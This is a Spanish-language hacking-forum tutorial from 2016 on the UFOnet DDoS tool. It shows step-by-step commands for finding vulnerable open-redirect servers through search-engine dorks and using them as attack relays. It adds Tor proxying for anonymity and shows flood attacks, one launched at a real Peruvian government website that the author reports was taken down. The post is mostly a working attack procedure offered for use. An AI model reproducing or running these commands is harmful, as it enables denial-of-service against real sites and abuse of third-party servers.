comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Enviando ataques masivos de DDoS con UFOnet

  • 0 Respuestas
  • 3098 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Mayo 21, 2016, 09:42:06 pm »

Saludos hermanos de underc0de en esta oportunidad les traigo la herramienta llamada "UFOnet" la cual funciona como una "Botnet" de distribución de denegación de servicio, en nuestro sistema operativo GNU/Linux recolectando fallos de servidores web con la vulnerabilidad "Open Redirect" la cual enviara varias peticiones con grandes paquetes a la pagina objetivo.

No tienes permisos para ver links. Registrate o Entra con tu cuenta


Descarga
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# git clone https://github.com/epsylon/ufonet
root@kali:~# cd ufonet
root@kali:~/ufonet# ls
root@kali:~/ufonet# cd ufonet
root@kali:~# ./ufonet


una ves descargado y comprobado que todo salio exitoso, vamos a configurar nuestro servidor añadiendo algunas configuraciones pero antes vamos a explicar algunos métodos que consta dicha herramienta.

Busqueda de Boots

Como sabrán esta herramienta consta de una búsqueda de indexiaciones por medio de "Dorks" donde vamos a encontrar parámetros GET  que son vulnerables para realizar este tipo de ataques como son:

    'check.cgi?url='
    'proxy.php?url='
    'validator?uri='
    'checklink?uri='

al realizar dichas consultas vamos a encontrarnos que el buscador por default es "duck", pero también podemos añadir otros parámetros para añadir otros buscadores como lo son bing, google, yahoo, yandex, etc, como son las siguientes:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'

pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'

como pueden observar esta elaborando una búsqueda general de todas las Dorks encontradas en dicho documento de texto, donde rápidamente se guardara en un archivo llamado "Zombies.txt".

Pero si deseamos tener una conexión anónima en este caso con un proxy que sea directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"
Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurarlo para Kali.

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Bueno primero que nada, vamos a  ejecutar algunas conexiones default de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url='

luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~/ufonet/ufonet# ./ufonet -i http://target.com

como vemos los archivos están siendo cargados de manera exitosa en nuestro servidor local, pero también podemos ejecutar  el siguiente comando para elaborar un TEST en el siguiente servicio.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~/ufonet/ufonet#  ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"


sin duda este ataque es muy efectivo ya que va realizar consultas con las listas mas grandes que puede ver en el servidor y es uno de los mas efectivos, pero también podemos ejecutar el siguiente que es aun mas prodigioso si es que se ha configurado bien el buscador de webs vulnerables, si deseamos lanzar un ataque mediante las conexiones de envíos por default podemos añadir lo siguiente:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v

como vemos primero nos carga los paquetes de envíos de las cabeceras, como acabamos de ver, pero al terminar lo siguiente, empezaremos a enviar las peticiones de acuerdo al tipo de threads que hemos realizado, como en mi caso fue 10, se ara una petición de 10 repeticiones:


como vemos en la siguiente imagen la herramienta consta de una website muy conocida llamada "downforeveryoneorjustme", donde nos dirá, si la web esta Down o UP como vemos nos dice que esta down o caída.



pero como siempre es bueno echar ojo en los servicios paso a verificarlo:



Lo interesante son los paquetes que envía y la respuesta que recibe.


entonces el Test del servidor se ha realizado correctamente. espero les haya gustado este POST.

Saludos!
« Última modificación: Mayo 30, 2016, 11:19:54 am por EPSILON »

 

¿Te gustó el post? COMPARTILO!



Script para automatizar 2 grados de ataques efectivos en sqlmap

Iniciado por VulN3T

Respuestas: 0
Vistas: 1048
Último mensaje Diciembre 16, 2017, 01:33:12 am
por VulN3T
XSStrike v1.2 – realiza ataques XSS de manera automatizada

Iniciado por ANTRAX

Respuestas: 1
Vistas: 2310
Último mensaje Enero 23, 2018, 11:16:33 am
por NSA17
Proteger nuestro server web de ataques con .htaccess

Iniciado por july

Respuestas: 10
Vistas: 5135
Último mensaje Julio 21, 2013, 09:46:43 pm
por CodePunisher
Diferencias entre DoS y DDoS

Iniciado por ANTRAX

Respuestas: 13
Vistas: 6946
Último mensaje Julio 09, 2015, 03:09:01 pm
por Decode
JavaPipe Ddos Protection & WAF

Iniciado por ZanGetsu

Respuestas: 1
Vistas: 1451
Último mensaje Septiembre 29, 2017, 07:50:18 pm
por KiddArabic